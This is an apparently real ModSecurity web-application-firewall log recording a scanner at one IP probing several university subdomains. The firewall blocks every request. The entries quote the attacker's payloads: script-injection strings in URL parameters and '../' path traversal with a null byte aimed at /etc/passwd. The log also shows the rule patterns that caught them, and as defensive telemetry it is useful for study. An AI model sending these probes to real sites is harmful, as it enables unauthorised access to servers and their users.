"ft.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnd3J0AAAAI"]
[Tue Aug 29 11:52:41.646285 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mcCo-f0AAAfWOQwAAAAL"]
[Tue Aug 29 11:52:41.697078 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnd3KEAAAAI"]
[Tue Aug 29 11:52:41.704720 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoT7OgAAAAD"]
[Tue Aug 29 11:52:41.735462 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnd3KIAAAAI"]
[Tue Aug 29 11:52:41.760356 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoQ3LUAAAAN"]
[Tue Aug 29 11:52:41.788527 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoO514AAAAK"]
[Tue Aug 29 11:52:42.530525 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoPuXgAAAAM"]
[Tue Aug 29 11:52:42.541214 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO518AAAAK"]
[Tue Aug 29 11:52:42.545351 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoLfJMAAAAG"]
[Tue Aug 29 11:52:42.545545 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu0AAAA0"]
[Tue Aug 29 11:52:42.553462 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoQ3LgAAAAN"]
[Tue Aug 29 11:52:42.581687 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoPuXoAAAAM"]
[Tue Aug 29 11:52:42.587440 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KYAAAAI"]
[Tue Aug 29 11:52:42.590164 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu4AAAA0"]
[Tue Aug 29 11:52:42.611389 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu8AAAA0"]
[Tue Aug 29 11:52:42.613267 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO52IAAAAK"]
[Tue Aug 29 11:52:43.532131 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAlUlvMAAAA0"]
[Tue Aug 29 11:52:43.596252 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAoO52gAAAAK"]
[Tue Aug 29 11:52:43.672230 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAoLfJ4AAAAG"]
[Tue Aug 29 11:52:44.540960 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAnTlUIAAAAA"]
[Tue Aug 29 11:52:44.541350 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoVqoQAAAAH"]
[Tue Aug 29 11:52:44.543914 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAlUlvoAAAA0"]
[Tue Aug 29 11:52:44.550266 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoO520AAAAK"]
[Tue Aug 29 11:52:45.145057 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnd3LcAAAAI"]
[Tue Aug 29 11:52:45.533485 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoQ3McAAAAN"]
[Tue Aug 29 11:52:45.539546 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnjjT8AAAAX"]
[Tue Aug 29 11:52:45.540202 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnHQngAAAAT"]
[Tue Aug 29 11:52:45.572012 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnjjUAAAAAX"]
